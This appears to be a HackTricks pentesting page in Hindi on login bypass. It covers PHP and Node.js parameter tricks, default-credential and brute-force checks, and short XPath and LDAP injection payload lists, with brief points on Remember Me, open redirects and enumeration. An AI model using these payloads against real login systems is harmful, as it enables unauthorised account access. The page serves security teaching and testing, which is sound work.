Login Bypass

Reading time: 5 minutes

tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks का समर्थन करें

नियमित लॉगिन बायपास करें

यदि आप एक लॉगिन पृष्ठ पाते हैं, तो यहां कुछ तकनीकें हैं जिन्हें आप बायपास करने के लिए आजमा सकते हैं:

  • पृष्ठ के अंदर टिप्पणियों की जांच करें (नीचे और दाईं ओर स्क्रॉल करें?)
  • जांचें कि क्या आप प्रतिबंधित पृष्ठों तक प्रत्यक्ष पहुंच प्राप्त कर सकते हैं
  • जांचें कि पैरामीटर न भेजें (कोई भी न भेजें या केवल 1)
  • PHP तुलना त्रुटि की जांच करें: user[]=a&pwd=b , user=a&pwd[]=b , user[]=a&pwd[]=b
  • सामग्री प्रकार को json में बदलें और json मान भेजें (bool true शामिल)
  • यदि आपको एक प्रतिक्रिया मिलती है जो कहती है कि POST समर्थित नहीं है, तो आप GET अनुरोध के साथ शरीर में JSON भेजने की कोशिश कर सकते हैं Content-Type: application/json
  • nodejs संभावित पार्सिंग त्रुटि की जांच करें (पढ़ें यहां): password[password]=1
  • Nodejs उस पेलोड को एक क्वेरी में बदल देगा जो निम्नलिखित के समान है: SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` ``password=password=1; जो पासवर्ड बिट को हमेशा सत्य बनाता है।
  • यदि आप एक JSON ऑब्जेक्ट भेज सकते हैं, तो आप लॉगिन बायपास करने के लिए "password":{"password": 1} भेज सकते हैं।
  • याद रखें कि इस लॉगिन को बायपास करने के लिए आपको अभी भी एक मान्य उपयोगकर्ता नाम जानने और भेजने की आवश्यकता है
  • mysql.createConnection को कॉल करते समय "stringifyObjects":true विकल्प जोड़ने से अंततः जब Object पैरामीटर में पास किया जाता है तो सभी अप्रत्याशित व्यवहारों को रोक देगा
  • क्रेडेंशियल्स की जांच करें:
  • डिफ़ॉल्ट क्रेडेंशियल्स का उपयोग की गई तकनीक/प्लेटफ़ॉर्म
  • सामान्य संयोजन (रूट, एडमिन, पासवर्ड, तकनीक का नाम, इनमें से किसी एक पासवर्ड के साथ डिफ़ॉल्ट उपयोगकर्ता)।
  • Cewl का उपयोग करके एक शब्दकोश बनाएं, डिफ़ॉल्ट उपयोगकर्ता नाम और पासवर्ड (यदि है) जोड़ें और सभी शब्दों का उपयोग करके इसे ब्रूट-फोर्स करने की कोशिश करें उपयोगकर्ता नाम और पासवर्ड
  • बड़े शब्दकोश का उपयोग करके ब्रूट-फोर्स करें (ब्रूट फोर्स)

SQL Injection प्रमाणीकरण बायपास

यहां आप SQL इंजेक्शन के माध्यम से लॉगिन बायपास करने के लिए कई तरकीबें पा सकते हैं

अगली पृष्ठ पर आप SQL इंजेक्शन के माध्यम से लॉगिन बायपास करने के लिए एक कस्टम सूची पा सकते हैं:

Login bypass List

No SQL Injection प्रमाणीकरण बायपास

यहां आप No SQL इंजेक्शन के माध्यम से लॉगिन बायपास करने के लिए कई तरकीबें पा सकते हैं

चूंकि NoSQL इंजेक्शन को पैरामीटर मान बदलने की आवश्यकता होती है, आपको उन्हें मैन्युअल रूप से परीक्षण करने की आवश्यकता होगी।

XPath Injection प्रमाणीकरण बायपास

यहां आप XPath इंजेक्शन के माध्यम से लॉगिन बायपास करने के लिए कई तरकीबें पा सकते हैं

' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2

LDAP Injection प्रमाणीकरण बाईपास

यहाँ आप LDAP Injection के माध्यम से लॉगिन बाईपास करने के लिए कई तरकीबें पा सकते हैं।

*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|

Remember Me

यदि पृष्ठ में "Remember Me" कार्यक्षमता है, तो जांचें कि इसे कैसे लागू किया गया है और देखें कि क्या आप इसका दुरुपयोग करके अन्य खातों पर नियंत्रण प्राप्त कर सकते हैं।

Redirects

पृष्ठ आमतौर पर लॉगिन के बाद उपयोगकर्ताओं को रीडायरेक्ट करते हैं, जांचें कि क्या आप उस रीडायरेक्ट को बदल सकते हैं ताकि Open Redirect का कारण बन सके। शायद आप कुछ जानकारी (कोड, कुकीज़...) चुरा सकते हैं यदि आप उपयोगकर्ता को अपने वेब पर रीडायरेक्ट करते हैं।

Other Checks

  • जांचें कि क्या आप लॉगिन कार्यक्षमता का दुरुपयोग करके उपयोगकर्ता नामों की गणना कर सकते हैं।
  • जांचें कि क्या पासवर्ड/संवेदनशील जानकारी फॉर्म इनपुट: <input autocomplete="false"> में स्वतः पूर्णता सक्रिय है।

Automatic Tools

tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks का समर्थन करें